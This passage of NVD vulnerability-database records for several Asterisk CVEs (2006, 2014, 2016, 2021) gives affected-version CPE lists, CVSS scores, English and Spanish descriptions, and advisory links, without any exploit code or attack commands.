              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "6DAF6784-0B31-4104-9D85-473D5AFAB785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "77B06B83-D62C-4A0E-BE94-83C9A02CE55A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert8:*:*:lts:*:*:*",
              "matchCriteriaId": "CAD17809-CBB1-4E41-99C9-20FE56853563",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert9:*:*:lts:*:*:*",
              "matchCriteriaId": "066453F2-A77F-4E82-8C91-AC17FAA21A89",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "D6EE9895-FB94-451D-8701-8C0DD8F5BED0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:-:*:*:*:*:*:*",
              "matchCriteriaId": "CCDDF5C2-9B45-4811-90F6-984EF4B220CF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "56849E34-B192-46A8-A517-C7C184A901B4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "4610D544-156F-4E9A-BC46-9E0FF8D5D641",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA74CB86-72C3-4913-8EB6-3BBA1D3BC65D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert1:*:*:*:*:*:*",
              "matchCriteriaId": "0C6CF412-290C-4524-9AFE-D58A85183864",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "BA3211EE-E305-4247-AA2E-910E48CBCDF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "9F68ED1E-8D2B-4AEE-B5DE-FD50338BA82D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:rc1:*:*:*:*:*:*",
              "matchCriteriaId": "EA9F296A-4932-4EA4-8B38-80856A9D6374",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:13.1.0:rc2:*:*:*:*:*:*",
              "matchCriteriaId": "B40673A6-2980-440A-B78E-D5C7095E3FA6",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "chan_sip in Asterisk Open Source 1.8.x, 11.x before 11.21.1, 12.x, and 13.x before 13.7.1 and Certified Asterisk 1.8.28, 11.6 before 11.6-cert12, and 13.1 before 13.1-cert3, when the timert1 sip.conf configuration is set to a value greater than 1245, allows remote attackers to cause a denial of service (file descriptor consumption) via vectors related to large retransmit timeout values."
    },
    {
      "lang": "es",
      "value": "chan_sip en Asterisk Open Source 1.8.x, 11.x en versiones anteriores a 11.21.1, 12.x y 13.x en versiones anteriores a 13.7.1 y Certified Asterisk 1.8.28, 11.6 en versiones anteriores a 11.6-cert12 y 13.1 en versiones anteriores a 13.1-cert3, cuando la configuraci\u00f3n de timert1 en sip.conf se establece en un valor mayor que 1245, permite a atacantes remotos causar una denegaci\u00f3n de servicio (consumo de descriptor de archivo) a trav\u00e9s de vectores relacionados con valores de caducidad de retransmisi\u00f3n grandes."
    }
  ],
  "id": "CVE-2016-2316",
  "lastModified": "2024-11-21T02:48:13.030",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "COMPLETE",
          "baseScore": 7.1,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "HIGH",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 5.9,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.2,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2016-02-22T15:59:02.160",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-002.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177409.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177422.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://www.debian.org/security/2016/dsa-3700"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/82651"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1034930"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://downloads.asterisk.org/pub/security/AST-2016-002.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177409.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://lists.fedoraproject.org/pipermail/package-announce/2016-February/177422.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.debian.org/security/2016/dsa-3700"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securityfocus.com/bid/82651"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory",
        "VDB Entry"
      ],
      "url": "http://www.securitytracker.com/id/1034930"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-191"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2021-02-18 21:15

Modified

2024-11-21 05:56

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Summary

Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets.

References

URL	Tags
cve@mitre.org	http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html	Third Party Advisory
cve@mitre.org	http://seclists.org/fulldisclosure/2021/Feb/59	Mailing List, Third Party Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/	Vendor Advisory
cve@mitre.org	https://downloads.asterisk.org/pub/security/AST-2021-003.html	Vendor Advisory
cve@mitre.org	https://issues.asterisk.org/jira/browse/ASTERISK-29260	Issue Tracking, Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html	Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2021/Feb/59	Mailing List, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://downloads.asterisk.org/pub/security/AST-2021-003.html	Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://issues.asterisk.org/jira/browse/ASTERISK-29260	Issue Tracking, Patch, Vendor Advisory

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	asterisk	*
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8
digium	certified_asterisk	16.8

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "DA727A7F-D350-450F-BF24-9E6D45FA6930",
              "versionEndIncluding": "13.38.2",
              "versionStartIncluding": "13.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "7382B641-0396-456F-BF33-3F6412E35F2D",
              "versionEndExcluding": "16.16.1",
              "versionStartIncluding": "16.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "C5BA8606-ADA9-4841-A7E2-A9165138849A",
              "versionEndExcluding": "17.9.2",
              "versionStartIncluding": "17.0.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F10CB148-DF9C-4134-A417-3B111C036E20",
              "versionEndExcluding": "18.2.1",
              "versionStartIncluding": "18.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:-:*:*:*:*:*:*",
              "matchCriteriaId": "81C3E390-8B99-4EB8-82DD-02893611209A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "17DB2297-1908-4F87-8046-2BAA74569D71",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "CEA2CC40-C2F6-4828-82F0-1B50D3E61F77",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "32F19F43-C1E8-4B6C-9356-AF355B7320BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert1-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "21D1FA32-B441-485F-8AE9-F3A394626909",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert2:*:*:*:*:*:*",
              "matchCriteriaId": "F7795CCF-B160-4B4F-9529-1192C11D7FDB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert3:*:*:*:*:*:*",
              "matchCriteriaId": "0C5E5D0D-9EB3-40FD-8B7E-E93A95D07AB1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4:*:*:*:*:*:*",
              "matchCriteriaId": "C7DFDA30-DD61-4BBC-AFE4-448BF2A4F303",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc1:*:*:*:*:*:*",
              "matchCriteriaId": "142F1F89-49AC-4A0B-A273-61F697063A5A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc2:*:*:*:*:*:*",
              "matchCriteriaId": "53041795-788C-4914-A2F6-41539ABE0244",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc3:*:*:*:*:*:*",
              "matchCriteriaId": "FBB98E65-B2D0-49A4-8BF3-12155E3E13C9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert4-rc4:*:*:*:*:*:*",
              "matchCriteriaId": "769C854C-03CD-40A9-B39B-C0CDCA8252EA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:16.8:cert5:*:*:*:*:*:*",
              "matchCriteriaId": "6D86AD6E-4E07-48B0-88D8-E18F277FFE6A",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Incorrect access controls in res_srtp.c in Sangoma Asterisk 13.38.1, 16.16.0, 17.9.1, and 18.2.0 and Certified Asterisk 16.8-cert5 allow a remote unauthenticated attacker to prematurely terminate secure calls by replaying SRTP packets."
    },
    {
      "lang": "es",
      "value": "Los controles de acceso incorrectos en el archivo res_srtp.c en Sangoma Asterisk versiones 13.38.1, 16.16.0, 17.9.1 y 18.2.0 y Certified Asterisk 16.8-cert5, permite a un atacante remoto no autenticado finalizar prematuramente llamadas seguras al reproducir paquetes SRTP"
    }
  ],
  "id": "CVE-2021-26712",
  "lastModified": "2024-11-21T05:56:43.550",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-02-18T21:15:11.447",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Third Party Advisory"
      ],
      "url": "http://packetstormsecurity.com/files/161473/Asterisk-Project-Security-Advisory-AST-2021-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://seclists.org/fulldisclosure/2021/Feb/59"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://downloads.asterisk.org/pub/security/AST-2021-003.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://issues.asterisk.org/jira/browse/ASTERISK-29260"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2014-11-24 15:59

Modified

2024-11-21 02:19

Severity ?

Summary

ConfBridge in Asterisk 11.x before 11.14.1 and Certified Asterisk 11.6 before 11.6-cert8 does not properly handle state changes, which allows remote attackers to cause a denial of service (channel hang and memory consumption) by causing transitions to be delayed, which triggers a state change from hung up to waiting for media.

References

▼	URL	Tags
	cve@mitre.org	http://downloads.asterisk.org/pub/security/AST-2014-014.html
	cve@mitre.org	http://seclists.org/fulldisclosure/2014/Nov/67
	af854a3a-2127-422b-91ae-364da2661108	http://downloads.asterisk.org/pub/security/AST-2014-014.html
	af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2014/Nov/67

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6
digium	certified_asterisk	11.6.0

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:lts:*:*:*",
              "matchCriteriaId": "6A0AB389-2564-4C10-86EB-130672C62AC1",
              "versionEndIncluding": "11.14.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert1:*:*:lts:*:*:*",
              "matchCriteriaId": "6AD7C9B3-D029-4E05-8E80-3ADA904FAC1C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert2:*:*:lts:*:*:*",
              "matchCriteriaId": "CE71221B-4D55-4643-B6D1-307B2CF41F98",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert3:*:*:lts:*:*:*",
              "matchCriteriaId": "88124275-9BEB-4D53-9E4D-1AC8C52F2D0F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert4:*:*:lts:*:*:*",
              "matchCriteriaId": "4F3CEFEF-72B6-4B58-81FE-01BCEEFB3013",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert5:*:*:lts:*:*:*",
              "matchCriteriaId": "AA637187-0EAE-4756-AD72-A0B2FABCA070",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert6:*:*:lts:*:*:*",
              "matchCriteriaId": "6DAF6784-0B31-4104-9D85-473D5AFAB785",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6:cert7:*:*:lts:*:*:*",
              "matchCriteriaId": "77B06B83-D62C-4A0E-BE94-83C9A02CE55A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:certified_asterisk:11.6.0:*:*:*:lts:*:*:*",
              "matchCriteriaId": "D6EE9895-FB94-451D-8701-8C0DD8F5BED0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "ConfBridge in Asterisk 11.x before 11.14.1 and Certified Asterisk 11.6 before 11.6-cert8 does not properly handle state changes, which allows remote attackers to cause a denial of service (channel hang and memory consumption) by causing transitions to be delayed, which triggers a state change from hung up to waiting for media."
    },
    {
      "lang": "es",
      "value": "ConfBridge en Asterisk 11.x anterior a 11.14.1 y Certified Asterisk 11.6 anterior a 11.6-cert8 no maneja debida mente los cambios de estado, lo que permite a atacantes remotos causar una denegaci\u00f3n de servicio (cuelgue de canal y consumo de memoria) al causar que transiciones se retrasen, lo que provoca un cambio de estado de estar colgado a estar esperado medios."
    }
  ],
  "id": "CVE-2014-8414",
  "lastModified": "2024-11-21T02:19:02.270",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2014-11-24T15:59:06.403",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-014.html"
    },
    {
      "source": "cve@mitre.org",
      "url": "http://seclists.org/fulldisclosure/2014/Nov/67"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://downloads.asterisk.org/pub/security/AST-2014-014.html"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://seclists.org/fulldisclosure/2014/Nov/67"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-399"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd

Published

2006-04-18 20:02

Modified

2024-11-21 00:09

Severity ?

Summary

Integer signedness error in format_jpeg.c in Asterisk 1.2.6 and earlier allows remote attackers to execute arbitrary code via a length value that passes a length check as a negative number, but triggers a buffer overflow when it is used as an unsigned length.

References

URL	Tags
cve@mitre.org	http://ftp.digium.com/pub/asterisk/releases/asterisk-1.2.7-patch.gz	Patch
cve@mitre.org	http://secunia.com/advisories/19800
cve@mitre.org	http://secunia.com/advisories/19872
cve@mitre.org	http://secunia.com/advisories/19897
cve@mitre.org	http://www.cipher.org.uk/index.php?p=advisories/Asterisk_Codec_Integer_Overflow_07-04-2006.advisory	Exploit, Patch
cve@mitre.org	http://www.debian.org/security/2006/dsa-1048
cve@mitre.org	http://www.novell.com/linux/security/advisories/2006_04_28.html
cve@mitre.org	http://www.securityfocus.com/bid/17561
cve@mitre.org	http://www.vupen.com/english/advisories/2006/1478
af854a3a-2127-422b-91ae-364da2661108	http://ftp.digium.com/pub/asterisk/releases/asterisk-1.2.7-patch.gz	Patch
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/19800
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/19872
af854a3a-2127-422b-91ae-364da2661108	http://secunia.com/advisories/19897
af854a3a-2127-422b-91ae-364da2661108	http://www.cipher.org.uk/index.php?p=advisories/Asterisk_Codec_Integer_Overflow_07-04-2006.advisory	Exploit, Patch
af854a3a-2127-422b-91ae-364da2661108	http://www.debian.org/security/2006/dsa-1048
af854a3a-2127-422b-91ae-364da2661108	http://www.novell.com/linux/security/advisories/2006_04_28.html
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/17561
af854a3a-2127-422b-91ae-364da2661108	http://www.vupen.com/english/advisories/2006/1478

Impacted products

Vendor	Product	Version
digium	asterisk	*
digium	asterisk	0.1.0
digium	asterisk	0.1.1
digium	asterisk	0.1.2
digium	asterisk	0.1.3
digium	asterisk	0.1.4
digium	asterisk	0.1.5
digium	asterisk	0.1.6
digium	asterisk	0.1.7
digium	asterisk	0.1.8
digium	asterisk	0.1.9
digium	asterisk	0.1.9.1
digium	asterisk	0.1.10
digium	asterisk	0.1.11
digium	asterisk	0.1.12
digium	asterisk	0.2
digium	asterisk	0.2.0
digium	asterisk	0.3
digium	asterisk	0.3.0
digium	asterisk	0.4
digium	asterisk	0.4.0
digium	asterisk	0.5.0
digium	asterisk	0.7.0
digium	asterisk	0.7.1
digium	asterisk	0.7.2
digium	asterisk	1.0.0
digium	asterisk	1.0.1
digium	asterisk	1.0.2
digium	asterisk	1.0.3
digium	asterisk	1.0.4
digium	asterisk	1.0.5
digium	asterisk	1.0.6
digium	asterisk	1.0.7
digium	asterisk	1.0.8
digium	asterisk	1.0.9
digium	asterisk	1.0_rc1
digium	asterisk	1.0_rc2
digium	asterisk	1.2.0_beta1

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:digium:asterisk:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D52340CE-D832-43A6-9552-5A5E014D1AA7",
              "versionEndIncluding": "1.2.6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "864D95C2-9B1B-4EB4-82CD-3BA5E063FEED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "D0FB4B52-69CA-45DA-AE22-E6667E8B98FA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD8FF789-3B09-4974-B62F-CCD7F5AA2BC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "F4FA92F7-46BB-444C-ADAB-4B550CD0B69C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "A003A2C3-1C4F-4A76-BABE-C55A761E3321",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "A063E6CD-16F8-42E0-A9A2-4D33C10F7EF2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "6EBC7FE3-D810-487C-8FD3-27B8729DCA41",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8C08E661-23D9-437F-844F-6BE8183CF3CA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "1D030C12-C2C6-4714-B776-2EF7ECF1A591",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.9:*:*:*:*:*:*:*",
              "matchCriteriaId": "CE5A8210-2E7C-465C-9751-CB362AADC224",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.9.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "82621C2B-B5F0-4E70-A619-0213005DADB6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "F9DBCFB5-65BF-46FE-AC19-2557B6C0BD01",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "99C185C9-9592-43A1-9811-80E16032F396",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.1.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "5BD696CD-3B63-4C8B-966E-EE00F44CA44C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9750B74B-F766-4869-880B-4E5E41D90533",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:digium:asterisk:0.2.0:*:*:*:*:*:*:*",
